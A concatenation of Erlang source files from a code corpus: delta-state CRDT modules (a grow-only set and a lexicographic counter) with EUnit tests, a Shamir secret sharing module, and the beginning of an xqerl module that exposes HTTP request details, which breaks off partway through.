%% Delta State Replicated Data Types (2016)
%% [http://arxiv.org/pdf/1603.01529v1.pdf]
%%
%% @reference <NAME>
%% delta-enabled-crdts C++ library
%% [https://github.com/CBaquero/delta-enabled-crdts]
-module(state_gset).
-author("<NAME> <<EMAIL>>").
-behaviour(type).
-behaviour(state_type).
-define(TYPE, ?MODULE).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([new/0, new/1]).
-export([mutate/3, delta_mutate/3, merge/2]).
-export([query/1, equal/2, is_bottom/1,
is_inflation/2, is_strict_inflation/2,
irreducible_is_strict_inflation/2]).
-export([join_decomposition/1, delta/2, digest/1]).
-export([encode/2, decode/2]).
-export_type([state_gset/0, state_gset_op/0]).
-opaque state_gset() :: {?TYPE, payload()}.
-type payload() :: ordsets:ordset(any()).
-type element() :: term().
-type state_gset_op() :: {add, element()}.
%% @doc Create a new, empty `state_gset()'
-spec new() -> state_gset().
new() ->
{?TYPE, ordsets:new()}.
%% @doc Create a new, empty `state_gset()'
-spec new([term()]) -> state_gset().
new([]) ->
new().
%% @doc Mutate a `state_gset()'.
-spec mutate(state_gset_op(), type:id(), state_gset()) ->
{ok, state_gset()}.
mutate(Op, Actor, {?TYPE, _GSet}=CRDT) ->
state_type:mutate(Op, Actor, CRDT).
%% @doc Delta-mutate a `state_gset()'.
%% The first argument can only be `{add, element()}'.
%% The second argument is the replica id (unused).
%% The third argument is the `state_gset()' to be inflated.
%% Returns a `state_gset()' delta which is a new `state_gset()'
%% with only one element - the element to be added to
%% the set. If the element is already in the set
%% the resulting delta will be an empty `state_gset()'.
-spec delta_mutate(state_gset_op(), type:id(), state_gset()) ->
{ok, state_gset()}.
delta_mutate({add, Elem}, _Actor, {?TYPE, GSet}) ->
Delta = case ordsets:is_element(Elem, GSet) of
true ->
ordsets:new();
false ->
ordsets:add_element(Elem, ordsets:new())
end,
{ok, {?TYPE, Delta}}.
%% @doc Returns the value of the `state_gset()'.
%% This value is a set with all the elements in the `state_gset()'.
-spec query(state_gset()) -> sets:set(element()).
query({?TYPE, GSet}) ->
sets:from_list(GSet).
%% @doc Merge two `state_gset()'.
%% The result is the set union of both sets in the
%% `state_gset()' passed as argument.
-spec merge(state_gset(), state_gset()) -> state_gset().
merge({?TYPE, GSet1}, {?TYPE, GSet2}) ->
GSet = ordsets:union(GSet1, GSet2),
{?TYPE, GSet}.
%% @doc Equality for `state_gset()'.
-spec equal(state_gset(), state_gset()) -> boolean().
equal({?TYPE, GSet1}, {?TYPE, GSet2}) ->
ordsets_ext:equal(GSet1, GSet2).
%% @doc Check if a GSet is bottom.
-spec is_bottom(state_gset()) -> boolean().
is_bottom({?TYPE, GSet}) ->
ordsets:size(GSet) == 0.
%% @doc Given two `state_gset()', check if the second is an inflation
%% of the first.
%% The second `state_gset()' is an inflation if the first set is
%% a subset of the second.
-spec is_inflation(state_gset(), state_gset()) -> boolean().
is_inflation({?TYPE, GSet1}, {?TYPE, GSet2}) ->
ordsets:is_subset(GSet1, GSet2);
%% @todo get back here later
is_inflation({cardinality, Value1}, {?TYPE, _}=GSet) ->
Value2 = query(GSet),
sets:size(Value2) >= Value1.
%% @doc Check for strict inflation.
-spec is_strict_inflation(state_gset(), state_gset()) -> boolean().
is_strict_inflation({?TYPE, _}=CRDT1, {?TYPE, _}=CRDT2) ->
state_type:is_strict_inflation(CRDT1, CRDT2);
%% @todo get back here later
is_strict_inflation({cardinality, Value1}, {?TYPE, _}=GSet) ->
Value2 = query(GSet),
sets:size(Value2) > Value1.
%% @doc Check for irreducible strict inflation.
-spec irreducible_is_strict_inflation(state_gset(),
state_type:digest()) ->
boolean().
irreducible_is_strict_inflation({?TYPE, [E]},
{state, {?TYPE, GSet}}) ->
not ordsets:is_element(E, GSet).
-spec digest(state_gset()) -> state_type:digest().
digest({?TYPE, _}=CRDT) ->
{state, CRDT}.
%% @doc Join decomposition for `state_gset()'.
%% The join decompostion for a `state_gset()' is the unique set
%% partition where each set of the partition has exactly one
%% element.
-spec join_decomposition(state_gset()) -> [state_gset()].
join_decomposition({?TYPE, GSet}) ->
ordsets:fold(
fun(Elem, Acc) ->
[{?TYPE, [Elem]} | Acc]
end,
[],
GSet
).
%% @doc Delta calculation for `state_gset()'.
-spec delta(state_gset(), state_type:digest()) -> state_gset().
delta({?TYPE, _}=A, B) ->
state_type:delta(A, B).
-spec encode(state_type:format(), state_gset()) -> binary().
encode(erlang, {?TYPE, _}=CRDT) ->
erlang:term_to_binary(CRDT).
-spec decode(state_type:format(), binary()) -> state_gset().
decode(erlang, Binary) ->
{?TYPE, _} = CRDT = erlang:binary_to_term(Binary),
CRDT.
%% ===================================================================
%% EUnit tests
%% ===================================================================
-ifdef(TEST).
new_test() ->
?assertEqual({?TYPE, ordsets:new()}, new()).
query_test() ->
Set0 = new(),
Set1 = {?TYPE, [<<"a">>]},
?assertEqual(sets:new(), query(Set0)),
?assertEqual(sets:from_list([<<"a">>]), query(Set1)).
delta_add_test() ->
Actor = 1,
Set0 = new(),
{ok, {?TYPE, Delta1}} = delta_mutate({add, <<"a">>}, Actor, Set0),
Set1 = merge({?TYPE, Delta1}, Set0),
{ok, {?TYPE, Delta2}} = delta_mutate({add, <<"a">>}, Actor, Set1),
Set2 = merge({?TYPE, Delta2}, Set1),
{ok, {?TYPE, Delta3}} = delta_mutate({add, <<"b">>}, Actor, Set2),
Set3 = merge({?TYPE, Delta3}, Set2),
?assertEqual({?TYPE, [<<"a">>]}, {?TYPE, Delta1}),
?assertEqual({?TYPE, [<<"a">>]}, Set1),
?assertEqual({?TYPE, []}, {?TYPE, Delta2}),
?assertEqual({?TYPE, [<<"a">>]}, Set2),
?assertEqual({?TYPE, [<<"b">>]}, {?TYPE, Delta3}),
?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set3).
add_test() ->
Actor = 1,
Set0 = new(),
{ok, Set1} = mutate({add, <<"a">>}, Actor, Set0),
{ok, Set2} = mutate({add, <<"b">>}, Actor, Set1),
?assertEqual({?TYPE, [<<"a">>]}, Set1),
?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set2).
merge_idempotent_test() ->
Set1 = {?TYPE, [<<"a">>]},
Set2 = {?TYPE, [<<"a">>, <<"b">>]},
Set3 = merge(Set1, Set1),
Set4 = merge(Set2, Set2),
?assertEqual(Set1, Set3),
?assertEqual(Set2, Set4).
merge_commutative_test() ->
Set1 = {?TYPE, [<<"a">>]},
Set2 = {?TYPE, [<<"a">>, <<"b">>]},
Set3 = merge(Set1, Set2),
Set4 = merge(Set2, Set1),
?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set3),
?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set4).
merge_deltas_test() ->
Set1 = {?TYPE, [<<"a">>]},
Delta1 = {?TYPE, [<<"a">>, <<"b">>]},
Delta2 = {?TYPE, [<<"c">>]},
Set2 = merge(Delta1, Set1),
Set3 = merge(Set1, Delta1),
DeltaGroup = merge(Delta1, Delta2),
?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set2),
?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set3),
?assertEqual({?TYPE, [<<"a">>, <<"b">>, <<"c">>]}, DeltaGroup).
equal_test() ->
Set1 = {?TYPE, [<<"a">>]},
Set2 = {?TYPE, [<<"a">>, <<"b">>]},
?assert(equal(Set1, Set1)),
?assertNot(equal(Set1, Set2)).
is_bottom_test() ->
Set0 = new(),
Set1 = {?TYPE, [<<"a">>]},
?assert(is_bottom(Set0)),
?assertNot(is_bottom(Set1)).
is_inflation_test() ->
Set1 = {?TYPE, [<<"a">>]},
Set2 = {?TYPE, [<<"a">>, <<"b">>]},
?assert(is_inflation(Set1, Set1)),
?assert(is_inflation(Set1, Set2)),
?assertNot(is_inflation(Set2, Set1)),
%% check inflation with merge
?assert(state_type:is_inflation(Set1, Set1)),
?assert(state_type:is_inflation(Set1, Set2)),
?assertNot(state_type:is_inflation(Set2, Set1)).
is_strict_inflation_test() ->
Set1 = {?TYPE, [<<"a">>]},
Set2 = {?TYPE, [<<"a">>, <<"b">>]},
?assertNot(is_strict_inflation(Set1, Set1)),
?assert(is_strict_inflation(Set1, Set2)),
?assertNot(is_strict_inflation(Set2, Set1)).
join_decomposition_test() ->
Set1 = {?TYPE, [<<"a">>]},
Set2 = {?TYPE, [<<"a">>, <<"b">>]},
Decomp1 = join_decomposition(Set1),
Decomp2 = join_decomposition(Set2),
?assertEqual([{?TYPE, [<<"a">>]}], Decomp1),
?assertEqual(lists:sort([{?TYPE, [<<"a">>]}, {?TYPE, [<<"b">>]}]), lists:sort(Decomp2)).
delta_test() ->
A = {?TYPE, ["a", "b", "c"]},
B = {state, {?TYPE, ["b", "d"]}},
Delta = delta(A, B),
?assertEqual({?TYPE, ["a", "c"]}, Delta).
encode_decode_test() ->
Set = {?TYPE, [<<"a">>, <<"b">>]},
Binary = encode(erlang, Set),
ESet = decode(erlang, Binary),
?assertEqual(Set, ESet).
-endif. | src/state_gset.erl | 0.684264 | 0.428532 | state_gset.erl | starcoder |
%% From: https://github.com/rnewson/shamir/tree/master/src/shamir.erl
%% Copyright 2011 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(shamir).
-export([share/3, recover/1]).
-include("shamir.hrl").
share(Secret, Threshold, Count) when is_binary(Secret) ->
share(binary_to_list(Secret), Threshold, Count);
share(Secret, Threshold, Count) when is_list(Secret) ->
Shares = transpose([share(Byte, Threshold, Count) || Byte <- Secret]),
[#share{threshold=Threshold, x=X, y=list_to_binary(lists:nth(X, Shares))}
|| X <- lists:seq(1, Count)];
share(Secret, Threshold, Count) when (Secret >= 0 andalso Secret =< 255) ->
GF = galois:generate(8),
Coeffs = binary_to_list(crypto:rand_bytes(Threshold - 1)) ++ [Secret],
[horner(GF, X, Coeffs) || X <- lists:seq(1, Count)].
horner(GF, X, Coeffs) ->
horner(GF, X, Coeffs, 0).
horner(_, _, [], Acc) ->
Acc;
horner(GF, X, [Coeff|Rest], Acc) ->
Mult = galois:multiply(GF, Acc, X),
Add = galois:add(GF, Mult, Coeff),
horner(GF, X, Rest, Add).
recover([#share{threshold=Threshold}|_]=Shares0) ->
Shares = lists:ukeysort(#share.x, Shares0),
X = [X || #share{x=X} <- Shares],
Ys = transpose(lists:map(fun(#share{y=Y}) ->
binary_to_list(Y) end, Shares)),
list_to_binary([recover(Threshold, Z) || Z <- [lists:zip(X, Y) || Y <- Ys]]).
recover(Threshold, Shares) when length(Shares) >= Threshold ->
lagrange(lists:sublist(Shares, Threshold)).
lagrange(Shares) ->
GF = galois:generate(8),
lists:foldl(fun(Share, Acc) ->
galois:add(GF, lagrange(GF, Share, Shares), Acc) end,
0, Shares).
lagrange(GF, Share, Shares) ->
lagrange(GF, Share, Shares, 1).
lagrange(GF, {_, Y}, [], Acc) ->
galois:multiply(GF, Y, Acc);
lagrange(GF, {X, Y}, [{X, _} | Rest], Acc) ->
lagrange(GF, {X, Y}, Rest, Acc);
lagrange(GF, {X1, Y1}, [{X2, _} | Rest], Acc) ->
lagrange(GF, {X1, Y1}, Rest,
galois:multiply(GF, Acc,
galois:divide(GF, X2,
galois:subtract(GF, X1, X2)))).
transpose([[X | Xs] | Xss]) ->
[[X | [H || [H | _] <- Xss]]
| transpose([Xs | [T || [_ | T] <- Xss]])];
transpose([[] | Xss]) -> transpose(Xss);
transpose([]) -> []. | src/shamir.erl | 0.652463 | 0.549761 | shamir.erl | starcoder |
%%
%% Copyright (c) 2015-2016 <NAME>. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc Lexicographic Counter.
%%
%% @reference <NAME>, <NAME>, and <NAME>
%% Delta State Replicated Data Types (2016)
%% [http://arxiv.org/pdf/1603.01529v1.pdf]
%%
%% @reference <NAME>
%% delta-enabled-crdts C++ library
%% [https://github.com/CBaquero/delta-enabled-crdts]
-module(state_lexcounter).
-author("<NAME> <<EMAIL>>").
-behaviour(type).
-behaviour(state_type).
-define(TYPE, ?MODULE).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([new/0, new/1]).
-export([mutate/3, delta_mutate/3, merge/2]).
-export([query/1, equal/2, is_bottom/1, is_inflation/2, is_strict_inflation/2, irreducible_is_strict_inflation/2]).
-export([join_decomposition/1, delta/3]).
-export([encode/2, decode/2]).
-export_type([state_lexcounter/0, state_lexcounter_op/0]).
-opaque state_lexcounter() :: {?TYPE, payload()}.
-type payload() :: orddict:orddict().
-type state_lexcounter_op() :: increment | decrement.
%% @doc Create a new, empty `state_lexcounter()'
-spec new() -> state_lexcounter().
new() ->
{?TYPE, orddict:new()}.
%% @doc Create a new, empty `state_lexcounter()'
-spec new([term()]) -> state_lexcounter().
new([]) ->
new().
%% @doc Mutate a `state_lexcounter()'.
-spec mutate(state_lexcounter_op(), type:id(), state_lexcounter()) ->
{ok, state_lexcounter()}.
mutate(Op, Actor, {?TYPE, _LexCounter}=CRDT) ->
state_type:mutate(Op, Actor, CRDT).
%% @doc Delta-mutate a `state_lexcounter()'.
%% The first argument can be `increment' or `decrement'.
%% The second argument is the replica id.
%% The third argument is the `state_lexcounter()' to be inflated.
-spec delta_mutate(state_lexcounter_op(), type:id(), state_lexcounter()) ->
{ok, state_lexcounter()}.
delta_mutate(increment, Actor, {?TYPE, LexCounter}) ->
{Left, Right} = case orddict:find(Actor, LexCounter) of
{ok, Value} ->
Value;
error ->
{0, 0}
end,
Delta = orddict:store(Actor, {Left, Right + 1}, orddict:new()),
{ok, {?TYPE, Delta}};
delta_mutate(decrement, Actor, {?TYPE, LexCounter}) ->
{Left, Right} = case orddict:find(Actor, LexCounter) of
{ok, Value} ->
Value;
error ->
{0, 0}
end,
Delta = orddict:store(Actor, {Left + 1, Right - 1}, orddict:new()),
{ok, {?TYPE, Delta}}.
%% @doc Returns the value of the `state_lexcounter()'.
%% A `state_lexcounter()' is a dictionary where the values are
%% pairs. The value of the `state_lexcounter()' is the sum of
%% the second components of these pairs.
-spec query(state_lexcounter()) -> non_neg_integer().
query({?TYPE, LexCounter}) ->
lists:sum([ Right || {_Actor, {_Left, Right}} <- LexCounter ]).
%% @doc Merge two `state_lexcounter()'.
%% The keys of the resulting `state_lexcounter()' are the union of the
%% keys of both `state_lexcounter()' passed as input.
%% If a key is only present on one of the `state_lexcounter()',
%% its correspondent lexicographic pair is preserved.
%% If a key is present in both `state_lexcounter()', the new value
%% will be the join of the lexicographic pairs.
-spec merge(state_lexcounter(), state_lexcounter()) -> state_lexcounter().
merge({?TYPE, _}=CRDT1, {?TYPE, _}=CRDT2) ->
MergeFun = fun({?TYPE, LexCounter1}, {?TYPE, LexCounter2}) ->
LexCounter = orddict:merge(
fun(_, Value1, Value2) ->
join(Value1, Value2)
end,
LexCounter1,
LexCounter2
),
{?TYPE, LexCounter}
end,
state_type:merge(CRDT1, CRDT2, MergeFun).
join({Left1, Right1}, {Left2, _Right2}) when Left1 > Left2 ->
{Left1, Right1};
join({Left1, _Right1}, {Left2, Right2}) when Left2 > Left1 ->
{Left2, Right2};
join({Left1, Right1}, {Left2, Right2}) when Left1 == Left2 ->
{Left1, max(Right1, Right2)};
join({Left1, _Right1}, {Left2, _Right2}) ->
{max(Left1, Left2), 0}.
%% @doc Equality for `state_lexcounter()'.
-spec equal(state_lexcounter(), state_lexcounter()) -> boolean().
equal({?TYPE, LexCounter1}, {?TYPE, LexCounter2}) ->
Fun = fun({Left1, Right1}, {Left2, Right2}) -> Left1 == Left2 andalso Right1 == Right2 end,
orddict_ext:equal(LexCounter1, LexCounter2, Fun).
%% @doc Check if a LexCounter is bottom.
-spec is_bottom(state_lexcounter()) -> boolean().
is_bottom({?TYPE, LexCounter}) ->
orddict:is_empty(LexCounter).
%% @doc Given two `state_lexcounter()', check if the second is and
%% inflation of the first.
%% We have an inflation if, for every key present in the first
%% `state_lexcounter()', that key is also in the second and,
%% the correspondent lexicographic pair in the second
%% `state_lexcounter()' is an inflation of the lexicographic pair
%% associated to the same key in the first `state_lexcounter()'.
%% A lexicographic pair P1 is an inflation of a lexicographic
%% pair P2 if one of the following:
%% - the first component of P2 is an inflation of the first
%% component of P1
%% - their first components are equal and the second component
%% of P2 is and inflation of the second component of P1
-spec is_inflation(state_lexcounter(), state_lexcounter()) -> boolean().
is_inflation({?TYPE, LexCounter1}, {?TYPE, LexCounter2}) ->
LexPairInflation = fun({Left1, Right1}, {Left2, Right2}) ->
(Left2 > Left1)
orelse
(Left1 == Left2 andalso Right2 >= Right1)
end,
lists_ext:iterate_until(
fun({Key, Value1}) ->
case orddict:find(Key, LexCounter2) of
{ok, Value2} ->
LexPairInflation(Value1, Value2);
error ->
false
end
end,
LexCounter1
).
%% @doc Check for strict inflation.
-spec is_strict_inflation(state_lexcounter(), state_lexcounter()) -> boolean().
is_strict_inflation({?TYPE, _}=CRDT1, {?TYPE, _}=CRDT2) ->
state_type:is_strict_inflation(CRDT1, CRDT2).
%% @doc Check for irreducible strict inflation.
-spec irreducible_is_strict_inflation(state_lexcounter(), state_lexcounter()) ->
boolean().
irreducible_is_strict_inflation({?TYPE, _}=Irreducible, {?TYPE, _}=CRDT) ->
state_type:irreducible_is_strict_inflation(Irreducible, CRDT).
%% @doc Join decomposition for `state_lexcounter()'.
%% @todo
-spec join_decomposition(state_lexcounter()) -> [state_lexcounter()].
join_decomposition({?TYPE, _}=CRDT) ->
[CRDT].
%% @doc Delta calculation for `state_lexcounter()'.
-spec delta(state_type:delta_method(), state_lexcounter(), state_lexcounter()) ->
state_lexcounter().
delta(Method, {?TYPE, _}=A, {?TYPE, _}=B) ->
state_type:delta(Method, A, B).
-spec encode(state_type:format(), state_lexcounter()) -> binary().
encode(erlang, {?TYPE, _}=CRDT) ->
erlang:term_to_binary(CRDT).
-spec decode(state_type:format(), binary()) -> state_lexcounter().
decode(erlang, Binary) ->
{?TYPE, _} = CRDT = erlang:binary_to_term(Binary),
CRDT.
%% ===================================================================
%% EUnit tests
%% ===================================================================
-ifdef(TEST).
new_test() ->
?assertEqual({?TYPE, []}, new()).
query_test() ->
Counter0 = new(),
Counter1 = {?TYPE, [{1, {1, 2}}, {2, {1, 13}}, {3, {1, 2}}]},
?assertEqual(0, query(Counter0)),
?assertEqual(17, query(Counter1)).
delta_test() ->
Counter0 = new(),
{ok, {?TYPE, Delta1}} = delta_mutate(increment, 1, Counter0),
Counter1 = merge({?TYPE, Delta1}, Counter0),
{ok, {?TYPE, Delta2}} = delta_mutate(decrement, 2, Counter1),
Counter2 = merge({?TYPE, Delta2}, Counter1),
{ok, {?TYPE, Delta3}} = delta_mutate(increment, 1, Counter2),
Counter3 = merge({?TYPE, Delta3}, Counter2),
?assertEqual({?TYPE, [{1, {0, 1}}]}, {?TYPE, Delta1}),
?assertEqual({?TYPE, [{1, {0, 1}}]}, Counter1),
?assertEqual({?TYPE, [{2, {1, -1}}]}, {?TYPE, Delta2}),
?assertEqual({?TYPE, [{1, {0, 1}}, {2, {1, -1}}]}, Counter2),
?assertEqual({?TYPE, [{1, {0, 2}}]}, {?TYPE, Delta3}),
?assertEqual({?TYPE, [{1, {0, 2}}, {2, {1, -1}}]}, Counter3).
increment_test() ->
Counter0 = new(),
{ok, Counter1} = mutate(increment, 1, Counter0),
{ok, Counter2} = mutate(decrement, 2, Counter1),
{ok, Counter3} = mutate(increment, 1, Counter2),
?assertEqual({?TYPE, [{1, {0, 1}}]}, Counter1),
?assertEqual({?TYPE, [{1, {0, 1}}, {2, {1, -1}}]}, Counter2),
?assertEqual({?TYPE, [{1, {0, 2}}, {2, {1, -1}}]}, Counter3).
merge_test() ->
Counter1 = {?TYPE, [{<<"5">>, {6, 2}}]},
Counter2 = {?TYPE, [{<<"5">>, {5, 3}}]},
Counter3 = {?TYPE, [{<<"5">>, {5, 10}}]},
Counter4 = merge(Counter1, Counter1),
Counter5 = merge(Counter1, Counter2),
Counter6 = merge(Counter2, Counter1),
Counter7 = merge(Counter2, Counter3),
?assertEqual({?TYPE, [{<<"5">>, {6, 2}}]}, Counter4),
?assertEqual({?TYPE, [{<<"5">>, {6, 2}}]}, Counter5),
?assertEqual({?TYPE, [{<<"5">>, {6, 2}}]}, Counter6),
?assertEqual({?TYPE, [{<<"5">>, {5, 10}}]}, Counter7).
merge_delta_test() ->
Counter1 = {?TYPE, [{<<"1">>, {2, 3}}, {<<"2">>, {5, 2}}]},
Delta1 = {?TYPE, [{<<"1">>, {2, 4}}]},
Delta2 = {?TYPE, [{<<"3">>, {1, 2}}]},
Counter2 = merge(Delta1, Counter1),
Counter3 = merge(Counter1, Delta1),
DeltaGroup = merge(Delta1, Delta2),
?assertEqual({?TYPE, [{<<"1">>, {2, 4}}, {<<"2">>, {5, 2}}]}, Counter2),
?assertEqual({?TYPE, [{<<"1">>, {2, 4}}, {<<"2">>, {5, 2}}]}, Counter3),
?assertEqual({?TYPE, [{<<"1">>, {2, 4}}, {<<"3">>, {1, 2}}]}, DeltaGroup).
equal_test() ->
Counter1 = {?TYPE, [{1, {2, 0}}, {2, {1, 2}}, {4, {1, 2}}]},
Counter2 = {?TYPE, [{1, {2, 0}}, {2, {1, 2}}, {4, {1, 2}}, {5, {6, 3}}]},
Counter3 = {?TYPE, [{1, {2, 0}}, {2, {2, 2}}, {4, {1, 2}}]},
Counter4 = {?TYPE, [{1, {2, 1}}, {2, {1, 2}}, {4, {1, 2}}]},
?assert(equal(Counter1, Counter1)),
?assertNot(equal(Counter1, Counter2)),
?assertNot(equal(Counter1, Counter3)),
?assertNot(equal(Counter1, Counter4)).
is_bottom_test() ->
Counter0 = new(),
Counter1 = {?TYPE, [{1, {2, 0}}, {2, {1, 2}}, {4, {1, 2}}]},
?assert(is_bottom(Counter0)),
?assertNot(is_bottom(Counter1)).
is_inflation_test() ->
Counter1 = {?TYPE, [{<<"1">>, {2, 0}}]},
Counter2 = {?TYPE, [{<<"1">>, {2, 0}}, {<<"2">>, {1, -1}}]},
Counter3 = {?TYPE, [{<<"1">>, {2, 1}}]},
Counter4 = {?TYPE, [{<<"1">>, {3, -2}}]},
Counter5 = {?TYPE, [{<<"1">>, {2, -1}}]},
?assert(is_inflation(Counter1, Counter1)),
?assert(is_inflation(Counter1, Counter2)),
?assertNot(is_inflation(Counter2, Counter1)),
?assert(is_inflation(Counter1, Counter3)),
?assert(is_inflation(Counter1, Counter4)),
?assertNot(is_inflation(Counter1, Counter5)),
%% check inflation with merge
?assert(state_type:is_inflation(Counter1, Counter1)),
?assert(state_type:is_inflation(Counter1, Counter2)),
?assertNot(state_type:is_inflation(Counter2, Counter1)),
?assert(state_type:is_inflation(Counter1, Counter3)),
?assert(state_type:is_inflation(Counter1, Counter4)),
?assertNot(state_type:is_inflation(Counter1, Counter5)).
is_strict_inflation_test() ->
Counter1 = {?TYPE, [{<<"1">>, {2, 0}}]},
Counter2 = {?TYPE, [{<<"1">>, {2, 0}}, {<<"2">>, {1, -1}}]},
Counter3 = {?TYPE, [{<<"1">>, {2, 1}}]},
Counter4 = {?TYPE, [{<<"1">>, {3, -2}}]},
Counter5 = {?TYPE, [{<<"1">>, {2, -1}}]},
?assertNot(is_strict_inflation(Counter1, Counter1)),
?assert(is_strict_inflation(Counter1, Counter2)),
?assertNot(is_strict_inflation(Counter2, Counter1)),
?assert(is_strict_inflation(Counter1, Counter3)),
?assert(is_strict_inflation(Counter1, Counter4)),
?assertNot(is_strict_inflation(Counter1, Counter5)).
join_decomposition_test() ->
%% @todo
ok.
encode_decode_test() ->
Counter = {?TYPE, [{<<"1">>, {2, 0}}, {<<"2">>, {1, -1}}]},
Binary = encode(erlang, Counter),
ECounter = decode(erlang, Binary),
?assertEqual(Counter, ECounter).
-endif. | _build/default/lib/types/src/state_lexcounter.erl | 0.68763 | 0.468608 | state_lexcounter.erl | starcoder |
%% -------------------------------------------------------------------
%%
%% xqerl - XQuery processor
%%
%% Copyright (c) 2020 <NAME> All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc Implementation of the "http://exquery.org/ns/request" namespace.
-module(xqerl_mod_exquery_request).
-include("xqerl.hrl").
-include_lib("kernel/include/inet.hrl").
-define(NS, <<"http://exquery.org/ns/request">>).
-define(PX, <<"request">>).
-define(ERRNS, <<"http://exquery.org/ns/request/error">>).
-define(ERRPX, <<"reqerr">>).
-export([
address/1,
cookie/2, cookie/3,
cookie_names/1,
header/2, header/3,
header_names/1,
hostname/1,
method/1,
parameter/2, parameter/3,
parameter_names/1,
path/1,
port/1,
query/1,
remote_address/1,
remote_hostname/1,
remote_port/1,
scheme/1,
uri/1
]).
-'module-namespace'({?NS, ?PX}).
-namespaces([]).
-variables([]).
-functions([
{{qname, ?NS, ?PX, <<"address">>}, {seqType, 'xs:string', one}, [], {'address', 1}, 0, []},
{{qname, ?NS, ?PX, <<"cookie">>}, {seqType, 'xs:string', zero_or_one}, [], {'cookie', 2}, 1, [
{seqType, 'xs:string', one}
]},
{{qname, ?NS, ?PX, <<"cookie">>}, {seqType, 'xs:string', one}, [], {'cookie', 3}, 2, [
{seqType, 'xs:string', one},
{seqType, 'xs:string', one}
]},
{
{qname, ?NS, ?PX, <<"cookie-names">>},
{seqType, 'xs:string', zero_or_many},
[],
{'cookie_names', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"header">>}, {seqType, 'xs:string', zero_or_one}, [], {'header', 2}, 1, [
{seqType, 'xs:string', one}
]},
{{qname, ?NS, ?PX, <<"header">>}, {seqType, 'xs:string', one}, [], {'header', 3}, 2, [
{seqType, 'xs:string', one},
{seqType, 'xs:string', one}
]},
{
{qname, ?NS, ?PX, <<"header-names">>},
{seqType, 'xs:string', zero_or_many},
[],
{'header_names', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"hostname">>}, {seqType, 'xs:string', one}, [], {'hostname', 1}, 0, []},
{{qname, ?NS, ?PX, <<"method">>}, {seqType, 'xs:string', one}, [], {'method', 1}, 0, []},
{
{qname, ?NS, ?PX, <<"parameter">>},
{seqType, 'xs:string', zero_or_many},
[],
{'parameter', 2},
1,
[{seqType, 'xs:string', one}]
},
{
{qname, ?NS, ?PX, <<"parameter">>},
{seqType, 'xs:string', zero_or_many},
[],
{'parameter', 3},
2,
[{seqType, 'xs:string', one}, {seqType, 'xs:string', one}]
},
{
{qname, ?NS, ?PX, <<"parameter-names">>},
{seqType, 'xs:string', zero_or_many},
[],
{'parameter_names', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"path">>}, {seqType, 'xs:string', one}, [], {'path', 1}, 0, []},
{{qname, ?NS, ?PX, <<"port">>}, {seqType, 'xs:integer', one}, [], {'port', 1}, 0, []},
{{qname, ?NS, ?PX, <<"query">>}, {seqType, 'xs:string', zero_or_one}, [], {'query', 1}, 0, []},
{
{qname, ?NS, ?PX, <<"remote-address">>},
{seqType, 'xs:string', one},
[],
{'remote_address', 1},
0,
[]
},
{
{qname, ?NS, ?PX, <<"remote-hostname">>},
{seqType, 'xs:string', one},
[],
{'remote_hostname', 1},
0,
[]
},
{
{qname, ?NS, ?PX, <<"remote-port">>},
{seqType, 'xs:integer', one},
[],
{'remote_port', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"scheme">>}, {seqType, 'xs:string', one}, [], {'scheme', 1}, 0, []},
{{qname, ?NS, ?PX, <<"uri">>}, {seqType, 'xs:anyURI', one}, [], {'uri', 1}, 0, []}
]).
-define(URI(D), #xqAtomicValue{type = 'xs:anyURI', value = D}).
%% 3.2 General Functions
%% 3.2.1 request:method
%% request:method() as xs:string
%% Summary:
%% This function returns the Method of the HTTP Request. The returned value
%% SHOULD be a valid HTTP 1.1 Method, which is expressed in upper-case, and
%% is one of the constants "OPTIONS", "GET", "POST", "PUT", "DELETE", "TRACE"
%% or "CONNECT". Implementations are free to return other method names as long
%% as the protocol builds on top of HTTP 1.1.
method(#{restxq_ctx := Req}) ->
cowboy_req:method(Req);
method(_) ->
no_context_error().
%% 3.3 URI Functions
%% 3.3.1 request:scheme
%% request:scheme() as xs:string
%% Summary:
%% This function returns the Scheme component of the URI of the HTTP Request.
scheme(#{restxq_ctx := Req}) ->
cowboy_req:scheme(Req);
scheme(_) ->
no_context_error().
%% 3.3.2 request:hostname
%% request:hostname() as xs:string
%% Summary:
%% This function returns the Hostname fragment of the Authority component of
%% the URI of the HTTP Request.
hostname(#{restxq_ctx := Req}) ->
cowboy_req:host(Req);
hostname(_) ->
no_context_error().
%% 3.3.3 request:port
%% request:port() as xs:integer
%% Summary:
%% This function returns the Port fragment of the Authority component of the
